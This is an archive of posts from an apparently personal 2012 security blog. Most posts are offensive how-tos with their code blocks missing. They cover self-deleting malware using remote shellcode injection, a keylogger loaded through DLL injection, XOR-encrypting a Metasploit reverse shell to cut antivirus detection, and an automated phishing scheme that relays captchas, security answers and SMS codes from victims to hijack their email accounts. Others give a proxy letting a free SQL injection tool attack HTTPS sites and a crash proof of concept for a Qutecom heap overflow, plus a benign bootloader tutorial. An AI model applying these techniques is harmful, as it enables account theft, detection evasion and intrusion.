Friday, November 23, 2012

Suicide via Remote Code Injection


A feature which very common among malwares that is "Self-Deletion". Malware authors uses various techniques to delete it self after successful infection. Very famous malware Flame had a built-in feature called "SUICIDE" that can be used to uninstall the malware from infected computers.

Please remember this information is for Educational Purpose only and should not be used for malicious purpose.I will not assume any liability or responsibility to any person or entity with respect to loss or damages incurred from information contained in this article.

Last night I wrote a very simple program that deletes it self without making any new copy of itself or creating any new process.
It actually injects some raw machine code (ShellCode) to any legitimate process and creates a new thread under that process. So when the injected ShellCode execute it deletes the main executable.

So here how it injects code to another process in this case it injects to explorer.exe. Its very common and usual technique to inject arbitrary code into any other process's address space.

So when you execute the compiled binary,

1) It first resolves the PID of explorer.exe. We know that explorer.exe is a process which will always be present in any windows system.
2) After getting the PID it gets the Handle to explorer.exe by using OpenProcess() API.
3) After that it allocates some memory on the remote process's (explorer.exe) address space for our ShellCode using VirtualAlloc() API.
4) After successful allocation it uses WriteProcessMemory() to write the shellcode into remote process.
5) Then it creates a new thread,which will then create a thread and execute the injected shellcode.

Few things about injected shellcode:

I have written the ShellCode in such way that the executable file path (file to be deleted) can just be appended with ShellCode.
Sot the main executable actually writes the [Shellcode]+[Full path of itself] to explorer.exe

The ShellCode present in this below example is HardCoded so it should only work on WinXP SP2 system.
When our main executable transfer the control to our shellcode it waits for 5 seconds (Usign Sleep!Kernel32.dll )and then delete the main executable using DeleteFile!Kernel32.dll.

Here is the C code.


Saturday, October 13, 2012

Writing a Basic Boot Code

When we first power on a PC, it usually does not have an operating system in ROM or RAM. BIOS is the first prog. that runs at start-up. BIOS is actually the firmware in ROM. The actual job of BIOS is to load the first sector of available boot-able disc and execute it. This is The only thing BIOS knows. So the small program situated in the first sector of the boot-able disc is known as a bootstrap loader, bootstrap or boot loader. This small program's job is to load other data and programs which are then executed from RAM.

This boot sector program is directly loaded by the BIOS at boot time. It is only 512 bytes in size.This sector of a hard disk is also known as Master Boot Record. This code is get loaded at 7C00. The last two bytes of the sector are checked for the values 0x55 and 0xAA while loading this in memory. If these are OK, the BIOS jumps to the address 7C00.


Generally this Master Boot Code can do following things:
  • It can load another boot sector.
  • It can load a second stage boot loader
  • It can load the kernel directly.
So it was all about boot primary booting.Another thing,which is very important to understand,that is BIOS interrupts.
"BIOS interrupt calls are a facility that DOS programs and some other software, such as boot loaders, use to invoke the facilities of the Basic Input/Output System.Boot loaders rely on them, most operating systems do not (the Linux kernel does not use BIOS interrupts once it has been started). MSDOS does use BIOS interrupts.The boot loader has access to BIOS interrupts, which are subroutines that can be invoked by the INT instruction (software interrupts)."..wiki

In this example we will only use "INT 0x10".
It is recommended to use virtual machine and virtual floppy/disc image for this work.
So Lets get started,
So first we we need to create an empty floppy disc image.

fallocate -l 1474560 image.vfd

This will create an empty floppy image called "image.vfd"After that we need to attach this image to our virtual machine.
So now let's have look at the code. Generally all boot sector programs,(e.g. GRUB), are written in assembly. So here is a very basic code Boot Code that will only prints a line on Monitor while booting.



We have to compile this code using nasm:

nasm bootloader.asm -f bin -o bootloader.bin

After successful compilation we will get the binary and we need to write this to the first sector of the booatble disc so that the BIOS can load and execute it. In this case we will write it into our virtual floppy image we have created earlier. This can be done is this way

dd if=bootloader.bin bs=512 of=/dev/fd0

After writing this code to your disc just reboot your virtual system attaching the bootable disc,it will print "Hi!I am Debasish and this is my first Bootloader! :) :) :)" and halt.


Reference :
http://en.wikipedia.org/wiki/Booting
http://technet.microsoft.com/en-us/library/cc976786.aspx
http://static.duartes.org/img/blogPosts/masterBootRecord.png
http://lennartb.home.xs4all.nl/bootloaders/node3.html
http://en.wikipedia.org/wiki/BIOS_interrupt_call#Invoking an interrupt

Saturday, September 29, 2012

KeyLogging through DLL Injection[The Simplest Way]



Keystroke logging is the action of tracking (or logging) the keys struck on a keyboard.Malwares often use dll injection technique to do malicious activity on a system. Few days back to demonstrate the process of how malwares can inject malicious dll to an existing process to do malicious activity on a system,I have coded a very simple dll which simply logs keystrokes after getting injected into a remote process. Here I am sharing the simplest part.


Please remember this information is for Educational Purpose only and should not be used for malicious purpose.I will not assume any liability or responsibility to any person or entity with respect to loss or damages incurred from information contained in this article.

Generally a keylogger for Win32 platform uses the SetWindowsHookEx API. Here I will also use the same technique to log keystrokes.

The Dll Code is written in C:

After successful injection to any arbitrarily chosen remote process the dll will log all keystrokes to "log.txt" file in the same directory.

Generally I use this python script to quickly inject any dlls to any process. I have added few line in this script for current purpose. Now this script will inject dll to target process and execute the function called "startlog()" which resides in the newly injected dll to start key logging. This script uses python ctype library. So make sure you have it installed with your python installation to make this script work.

Reference: http://thetechnofreak.com/technofreak/keylogger-visual-c/

Friday, August 10, 2012

Experiment With Run Time Encryption/Decryption of Win32 ShellCodes

Hello all in this post I am gonna share one of my experiment with shellcodes with you guys. So, before we begin I wanna warn you guys about one thing that the shellcode I have used in this example is a reverse_tcp shell code. So I will suggest you to use some harmless shell code like WinExec CALC while doing such experiment.

So I started with generating a raw binary of metasploit's windows/shell_reverse_tcp payload. After generating the raw binary I ran a quick anti virus scan of that binary using VirusTotal.com. Here is the output of virustotal.com.



31/42. 31 out of 42 anti viruses detected that binary.As usual result was not so much shocking for me.

So I decided to play with that and trying to reduce the detection rate. To do that I generated the raw shellcode from metasploit with single itaration of default encoder shikata_ga_nai. Here is the generated shell code from metasploit.

Obviously I took the encoded one which is null free shellcode. So after that I quickly wrote a XOR encrypt-er in C and encrypted the generated shellcode with a random key. Here is the code of the encrypter.

C code to Encrypt ShellCode using XOR:

So compiling and running the code gave me one XOR encrypted ShellCode.

So from output I removed the extra bytes and extracted the encrypted shellcode.

Upto this its quite easy enough. But actual challenge is running the shellcode on target properly. So to do that we can do following things on run time of the binary.

  1. Decrypt the encrypted shellcode with the key used to encrypt the shellcode.
  2. Allocate a enough space on virtual memory for the decrypted shell code using VirtualAlloc()
  3. Copy decrypted shellcode to the allocated memory using RtlMoveMemory()
  4. Execute the certain region using CreateThread()
So I did exactly the same.

Here is the C code to Decrypt the shellcode and execute it on run time .

So after compiling the code before running I did a quick run time analysis of compiled binary using OllyDBG. Here is few screen shots taken at run time analysis of that binary.



And after that you know what the interesting part is?? Again I ran a quick scan of that new binary using VirusTotal. The detection rate was reduced from 31/42 to 7/42!!!!!


Thank you for reading. Feel free to leave comments for any confusion or question.

Saturday, July 28, 2012

How I can reset your Email password? An MITM based Social Engineering (Phishing)attack!



This article of mine was first published on iViZ Security Blog!
Here is the actual article

http://www.ivizsecurity.com/blog/penetration-testing/how-i-can-reset-your-gmail-password-an-mitm-based-social-engineering-attack/

-----------------------------------------------------------------------------------------------------------------------------
Hacking email account is probably something which intrigues all of us. Phishing is an example of social engineering techniques used to take advantage of human ignorance. It allows unscrupulous people to exploit the weaknesses in web security technology.Here we will discuss about an advanced way which can be used to perform an advanced automated phishing attack.

Attack Strategy:
As cyber awareness is increasing day by day,number of failed phishing attempts is also increasing. Most of the Internet users goes through few check before entering critical information like user name password in an web form.This approach is a kind of an indirect phishing attack.Here instead of asking victims directly their user name and password attacker will put some challenges to victim which Google or any other email service provider gives us while trying to reset the password of his/her Email account. When victim solve those challenges we will take the solution of those challenges from victim and submit it to actual server and successfully reset password in an automated manner. These challenges can be related to answering security questions or SMS based password reset.

Attack Strategy at a Glance:




Setup:
Here our main intention is to abuse the same password reset functionality of various email service providers in a smarter and automated manner.We will use selenium and its Python WebDriver api to automate this entire process.Selenium is a software testing framework for web applications. Selenium can automate browser locally or remotely. http://seleniumhq.org/.) We will write a custom selenium web server in python and a dynamic fake survey form in PHP. The fake survey form will communicate with selenium web server using its custom APIs in back end(using PHP curl or something similar thing).


Execution:

Step 1: Start the custom Selenium Server

First we will start our custom selenium web server and host the fake survey form to any hosting service provider supporting PHP and PHP Curl. And we will send the link of that fake survey from to victim.

After the server is started this custom selenium web server will be always monitoring the victim’s activity. When victim visits the fake survey form its will inform the selenium web server through PHP curl that victim has opened the page.

Step 2: Send the custom form to the target

Create a fake registration form of anything you like form which will ask the user for the email id. You can create a new interesting free coupon for restaurants, free download etc. When the victim user will enter his/her email id our the custom web server will try to recover the password of that entered email id received from fake survey from using selenium webdriver api automatically. As selenium is quite fast it will take maximum 5 to 6 seconds.

Step 3: Automatically initiate the recovery password reset process

Almost all well known web mail providers (e.g. Google Yahoo etc.)uses some anti automation techniques (Captcha)in these type of critical steps. And those captchas are not very easy to crack by human being also so trying to crack those with available OCR engines will be waste of time.So human effort is must to break those captcha. How? We have a trick for that also.

Step 4: Send back the captcha/secret question/any challenge to the user to break

After detecting an anti automation on page, our selenium web server will extract the captcha from password recovery form and ask the victim to solve the same captcha.When the victim will solve the captcha it will take that answer and submit the actual captcha form.BINGO!

When captcha is cracked it will face the first security question(if its available), then it will extract the first security question from actual password recovery form and add the question in the survey from with other fake questions to make the survey form bit more realistic.

Step 5: Send the user response to Gmail and reset the password

When the victim will answer that question it will instantly take that answer and submit it in actual password recovery from.We expect that the victim will answer the security questions correctly.

After that when it will face the second security question and it will treat this in the same manner. When its done upto this level it will change the account password to our desired one automatically.

Abusing SMS/Email Based Password Recovery system using the same technique:

SMS/Email Based Password Recovery system can also be abused using the same technique. If we consider gmail then it will be like when out custom selenium web server will detect that there is not option from Security question in password recovery from of target email account it will go for SMS based password recovery option. Generally google’s web application discloses the the last two digits of given phone number and it will send the SMS to that phone. Our custom selenium web server will also do the same. It will directly extract the last two digit from recovery form and send it to victim. The phishing from is designed is such a way that it will say something like this

“Hey you have to go through a verification process to download this software package. Please enter your mobile no.We will send a verification code through Google to that number”.

Luckily Google sends the password recover code through SMS very poorly. It will just send a sms like

“Your Google Verification Code is :123456”.


Within a second after entering the mobile number our selenium web server will submit the mobile number and the victim will receive the password reset code from Google. As currently no indication is present in that SMS sent by Google that its a very critical code not like other verification code, so its very obvious for a general Internet user to trust the application and share the password reset code.

In the next step it will ask for the received code and after getting the code our selenium server will do the rest part which is changing the password.

Video Demo:

Conclusion:

As password recovery sections are very critical, service providers maintain very strict session information in these areas. Automatically passing these sections is very tough by sending http requests using any scripting languages. If some thing goes wrong it will entirely destroy the session so chances of attack getting failed is very high.If we consider gmail the application is very much dynamic so parsing java scripts from http response and getting required values is very much difficult.

A Very Basic Custom Selenium Web Server Code Used in this Demo:


Saturday, July 21, 2012

HTTP to HTTPS Proxy Tunnel using Python



From title you might think that its a useless piece of code.But let me tell you its not.I dint write this to timepass.A a pretty much good automated SQLi tool called Havij(Hope you guys are already familiar with) forced me to write this. Not exactly but its a kind of an external plugin for the tool Havij(Free Version).

Havij is an automated SQL Injection tool.No doubt its a great tool for doing automated SQL injection.But one problem with this tool is its not fully free! :(
The free version also has many great features but one problem I have faced while using this free version that is,it does not allows users to scan/run database enumeration on sites which uses SSL (https://) :(

So to overcome this limitation I have decided to write a proxy for it. But this proxy is not like most common http proxies. This proxy can be used to scan a ssl enabled site using Free Version of Havij.
Suppose you wanna try SQLi on "https://www.target.com/search.php?name=debasish" using Havij.So when you try to fire a scan using Havij you get an error like 
"Havij Free does not allow https://".blah blah ....

So to overcome this limitation what you have to do is :

  1. Configure your Havij Free to use a http proxy 127.0.0.1:8080 while scanning.
  2. Run this python script.(It will start a proxy server on port 127.0.0.1:8080)
  3. In the target field of Havij instead of entering "https://www.target.com.search.php?name=debasish" you need to add "http://www.target.com/search.php?name=debasish".So when you start scanning through havij the proxy script will do following:

       3.1. Take plain http request(SQLi request) from Havij.2
       3.2. Create a SSL connection to target.3
       3.3. Forward the same request received from Havij to target server.
       3.4. After receiving the response from server through secure shell it will feed the response to Havij.

This proxy is not suitable for web browsing. You will face some problems. Normal request/response generally used for SQLi it can handle. But one bad thing about this script is,it will make the speed of you SQLi process bit slower. It has the ability to handle gzip compressed response.

So here is the code: Enjoy SQLi on SSL sites using Havij Free!I dint test it much, so let me know if it is not working properly.

Friday, June 22, 2012

Qutecom Softphone 2.2.1 Heap Overflow Vulnerability[OSVDB-83272]


QuteCom is a cross platform soft phone.QuteCom v2.2.1 suffers from a heap-based buffer-overflow vulnerability.Successful exploitation may allows execution of arbitrary code, but requires tricking a user into dialing a long phone number from vulnerable phone.Failed attacks will cause a denial-of-service condition.This bug in Qutecom v2.2.1 is caused due to a boundary error in the processing of too long phone number.This heap buffer overflow bug can be triggered by dialing a more than 5000 character phone number or character set form the soft phone.

Also available at  http://www.exploit-db.com/exploits/19328/

                   http://osvdb.org/show/osvdb/83272





Title:
Qutecom Version 2.2.1 Heap Overflow DoS/Crash Proof of Concept
Summary:
QuteCom (previously called WengoPhone) is a free software SIP compliant VoIP client developed by the QuteCom (previously OpenWengo) community under the GNU General Public License (GPL). It allows users to speak to other users of SIP compliant VoIP software at no cost.
(Source :http://en.wikipedia.org/wiki/QuteCom)

This bug in Qutecom v2.2.1 is caused due to a boundary error in the processing of too long phone number.This heap buffer overflow bug can be triggered by dialing a more than 5000 character phone number or character set form the soft phone.
To trigger this bug the application must be connected to a VOIP/SIP server.An Asterisk-based PBX Phone System "TrixBox" was used to test this Crash.

Tested on:
Tested with latest stable release http://trac.qutecom.org/downloads/QuteCom-2.2.1-setup-release.exe on Microsoft Windows XP Professional SP2 EN (32bit)
An Asterisk-based PBX Phone System "TrixBox" was used as SIP server.

WinDBG Output After Feeding 5000 'A's into the application:




Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: c:\symbols\private;srv*c:\symbols\web*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00400000 00789000   C:\Program Files\QuteCom\QuteCom.exe
ModLoad: 7c900000 7c9b0000   C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f4000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 10000000 10021000   C:\Program Files\QuteCom\owutil.dll
ModLoad: 77e70000 77f01000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77dd0000 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 7c9c0000 7d1d4000   C:\WINDOWS\system32\SHELL32.dll
ModLoad: 77c10000 77c68000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 77f10000 77f56000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 77d40000 77dd0000   C:\WINDOWS\system32\USER32.dll
ModLoad: 77f60000 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 7c420000 7c4a7000   C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86\MSVCP80.dll
ModLoad: 78130000 781cb000   C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86\MSVCR80.dll
ModLoad: 00240000 0024d000   C:\Program Files\QuteCom\boost_thread-vc80-mt-1_34_1.dll
ModLoad: 00260000 00275000   C:\Program Files\QuteCom\webcam.dll
ModLoad: 76b40000 76b6d000   C:\WINDOWS\system32\WINMM.dll
ModLoad: 774e0000 7761c000   C:\WINDOWS\system32\ole32.dll
ModLoad: 77120000 771ac000   C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 00290000 0029f000   C:\Program Files\QuteCom\boost_signals-vc80-mt-1_34_1.dll
ModLoad: 01120000 014a4000   C:\Program Files\QuteCom\avcodec-51.dll
ModLoad: 002b0000 002bb000   C:\Program Files\QuteCom\avutil-49.dll
ModLoad: 002c0000 002d0000   C:\Program Files\QuteCom\owsl.dll
ModLoad: 002e0000 002e7000   C:\Program Files\QuteCom\owbase.dll
ModLoad: 00300000 0030b000   C:\Program Files\QuteCom\pthread.dll
ModLoad: 71ab0000 71ac7000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 00320000 00349000   C:\Program Files\QuteCom\curl.dll
ModLoad: 014b0000 0157c000   C:\Program Files\QuteCom\LIBEAY32.dll
ModLoad: 71ad0000 71ad9000   C:\WINDOWS\system32\WSOCK32.dll
ModLoad: 7c360000 7c3b6000   C:\Program Files\QuteCom\MSVCR71.dll
ModLoad: 00360000 00386000   C:\Program Files\QuteCom\SSLEAY32.dll
ModLoad: 76d60000 76d79000   C:\WINDOWS\system32\iphlpapi.dll
ModLoad: 67000000 671e1000   C:\Program Files\QuteCom\QtCore4.dll
ModLoad: 65000000 6573d000   C:\Program Files\QuteCom\QtGui4.dll
ModLoad: 763b0000 763f9000   C:\WINDOWS\system32\comdlg32.dll
ModLoad: 5d090000 5d127000   C:\WINDOWS\system32\COMCTL32.dll
ModLoad: 76390000 763ad000   C:\WINDOWS\system32\IMM32.dll
ModLoad: 73000000 73026000   C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 64000000 640da000   C:\Program Files\QuteCom\QtNetwork4.dll
ModLoad: 61000000 61054000   C:\Program Files\QuteCom\QtXml4.dll
ModLoad: 66000000 66041000   C:\Program Files\QuteCom\QtSvg4.dll
ModLoad: 01580000 01e49000   C:\Program Files\QuteCom\QtWebKit4.dll
ModLoad: 77c00000 77c08000   C:\WINDOWS\system32\VERSION.dll
ModLoad: 01e50000 01e8f000   C:\Program Files\QuteCom\phonon4.dll
ModLoad: 01e90000 01e98000   C:\Program Files\QuteCom\psiidle.dll
ModLoad: 771b0000 77256000   C:\WINDOWS\system32\WININET.dll
ModLoad: 77a80000 77b14000   C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000   C:\WINDOWS\system32\MSASN1.dll
ModLoad: 77260000 772fc000   C:\WINDOWS\system32\urlmon.dll
ModLoad: 01eb0000 01ec0000   C:\Program Files\QuteCom\portaudio.dll
ModLoad: 01ed0000 01f07000   C:\Program Files\QuteCom\boost_serialization-vc80-mt-1_34_1.dll
ModLoad: 01f20000 01f5c000   C:\Program Files\QuteCom\boost_program_options-vc80-mt-1_34_1.dll
ModLoad: 01f70000 02024000   C:\Program Files\QuteCom\glib.dll
ModLoad: 02040000 0204b000   C:\Program Files\QuteCom\intl.dll
ModLoad: 02050000 02129000   C:\Program Files\QuteCom\iconv.dll
ModLoad: 02130000 02138000   C:\Program Files\QuteCom\gthread.dll
ModLoad: 02150000 02275000   C:\Program Files\QuteCom\libpurple.dll
ModLoad: 02290000 022be000   C:\Program Files\QuteCom\gobject.dll
ModLoad: 66780000 66ad5000   C:\Program Files\QuteCom\libgnutls-26.dll
ModLoad: 022d0000 02586000   C:\Program Files\QuteCom\libgcrypt-11.dll
ModLoad: 02590000 02663000   C:\Program Files\QuteCom\libgpg-error-0.dll
ModLoad: 02670000 02760000   C:\Program Files\QuteCom\libxml2.dll
ModLoad: 02760000 02772000   C:\Program Files\QuteCom\zlib1.dll
ModLoad: 02780000 02811000   C:\Program Files\QuteCom\phapi.dll
ModLoad: 02830000 02837000   C:\Program Files\QuteCom\phapiutil.dll
ModLoad: 773d0000 774d2000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
ModLoad: 02eb0000 02ede000   C:\Program Files\ProxyFirewall\PFW.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
ModLoad: 77d00000 77d33000   C:\WINDOWS\system32\netman.dll
ModLoad: 76400000 765a6000   C:\WINDOWS\system32\netshell.dll
ModLoad: 76e80000 76e8e000   C:\WINDOWS\system32\rtutils.dll
ModLoad: 76c00000 76c2e000   C:\WINDOWS\system32\credui.dll
ModLoad: 76b20000 76b31000   C:\WINDOWS\system32\ATL.DLL
ModLoad: 76d40000 76d58000   C:\WINDOWS\system32\MPRAPI.dll
ModLoad: 77cc0000 77cf2000   C:\WINDOWS\system32\ACTIVEDS.dll
ModLoad: 76e10000 76e35000   C:\WINDOWS\system32\adsldpc.dll
ModLoad: 5b860000 5b8b4000   C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 76f60000 76f8c000   C:\WINDOWS\system32\WLDAP32.dll
ModLoad: 71bf0000 71c03000   C:\WINDOWS\system32\SAMLIB.dll
ModLoad: 77920000 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 76ee0000 76f1c000   C:\WINDOWS\system32\RASAPI32.dll
ModLoad: 76e90000 76ea2000   C:\WINDOWS\system32\rasman.dll
ModLoad: 76eb0000 76edf000   C:\WINDOWS\system32\TAPI32.dll
ModLoad: 77fe0000 77ff1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 77620000 7768e000   C:\WINDOWS\system32\WZCSvc.DLL
ModLoad: 76d30000 76d34000   C:\WINDOWS\system32\WMI.dll
ModLoad: 76d80000 76d9e000   C:\WINDOWS\system32\DHCPCSVC.DLL
ModLoad: 76f20000 76f47000   C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 76f50000 76f58000   C:\WINDOWS\system32\WTSAPI32.dll
ModLoad: 76360000 76370000   C:\WINDOWS\system32\WINSTA.dll
ModLoad: 606b0000 607bd000   C:\WINDOWS\system32\ESENT.dll
ModLoad: 73030000 73040000   C:\WINDOWS\system32\WZCSAPI.DLL
ModLoad: 71a50000 71a8f000   C:\WINDOWS\System32\mswsock.dll
ModLoad: 662b0000 66308000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a90000 71a98000   C:\WINDOWS\System32\wshtcpip.dll
ModLoad: 76fb0000 76fb8000   C:\WINDOWS\System32\winrnr.dll
ModLoad: 76fc0000 76fc6000   C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 03420000 03429000   C:\Program Files\QuteCom\imageformats\qgif4.dll
ModLoad: 03440000 03461000   C:\Program Files\QuteCom\imageformats\qjpeg4.dll
ModLoad: 03480000 034b9000   C:\Program Files\QuteCom\imageformats\qmng4.dll
ModLoad: 034d0000 034d8000   C:\Program Files\QuteCom\imageformats\qsvg4.dll
ModLoad: 034f0000 03537000   C:\Program Files\QuteCom\imageformats\qtiff4.dll
ModLoad: 769c0000 76a73000   C:\WINDOWS\system32\userenv.dll
ModLoad: 76c30000 76c5e000   C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 76c90000 76cb8000   C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 72d20000 72d29000   C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d10000 72d18000   C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 20000000 202c5000   C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 0ffd0000 0fff8000   C:\WINDOWS\system32\rsaenh.dll
ModLoad: 03560000 0356d000   C:\Program Files\QuteCom\sfp-plugin.dll
ModLoad: 76fd0000 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
ModLoad: 77050000 77115000   C:\WINDOWS\system32\COMRes.dll
ModLoad: 75f40000 75f51000   C:\WINDOWS\system32\devenum.dll
ModLoad: 736b0000 736b7000   C:\WINDOWS\system32\msdmo.dll
ModLoad: 76780000 76789000   C:\WINDOWS\system32\shfolder.dll
ModLoad: 09a80000 09a87000   C:\Program Files\Internet Download Manager\idmmkb.dll
ModLoad: 0b890000 0b8a8000   C:\Program Files\QuteCom\phapi-plugins\phspeexplugin.dll
ModLoad: 0a560000 0a574000   C:\PROGRA~1\INVISI~1\keycapt.dll
ModLoad: 73080000 7309c000   C:\WINDOWS\system32\rsvpsp.dll
ModLoad: 68100000 68124000   C:\WINDOWS\system32\dssenh.dll
ModLoad: 77b40000 77b62000   C:\WINDOWS\system32\Apphelp.dll
(9b4.f38): Access violation - code c0000005 (!!! second chance !!!)
eax=41414141 ebx=02d70000 ecx=085d87d8 edx=02d70478 esi=085d87d0 edi=41414141
eip=7c9111de esp=0b88fb94 ebp=0b88fdb4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202
ntdll!RtlAllocateHeap+0x567:
7c9111de 8b10            mov     edx,dword ptr [eax]  ds:0023:41414141=????????

This is a potentially exploitable condition.In this case, flink is EAX and blink is EDI. Under XP sp0-1 a basic UEF function overwrite is enough to take control. 


0:000> r
eax=41414141 ebx=02d70000 ecx=0860efc0 edx=02d70178 esi=0860efb8 edi=41414141
eip=7c9111de esp=0111d42c ebp=0111d64c iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000216
ntdll!RtlAllocateHeap+0x567:
7c9111de 8b10            mov     edx,dword ptr [eax]  ds:0023:41414141=????????

0:000> d esi
0860efb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0860efc8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0860efd8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0860efe8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0860eff8  41 41 41 41 41 41 41 41-?? ?? ?? ?? ?? ?? ?? ??  AAAAAAAA????????

0:000> u 7c9111de
ntdll!RtlAllocateHeap+0x567:
7c9111de 8b10            mov     edx,dword ptr [eax]
7c9111e0 3b5704          cmp     edx,dword ptr [edi+4]
7c9111e3 0f858c310200    jne     ntdll!RtlAllocateHeap+0x579 (7c934375)
7c9111e9 3bd1            cmp     edx,ecx
7c9111eb 0f8584310200    jne     ntdll!RtlAllocateHeap+0x579 (7c934375)
7c9111f1 8938            mov     dword ptr [eax],edi
7c9111f3 894704          mov     dword ptr [edi+4],eax
7c9111f6 3bf8            cmp     edi,eax

Vedor Report:

I have sent several notifications to qutecom on this bug in this application but I havn't got any response.
Bug Ticket :http://qutecom.org/ticket/399
mail to : qutecom-dev@lists.qutecom.org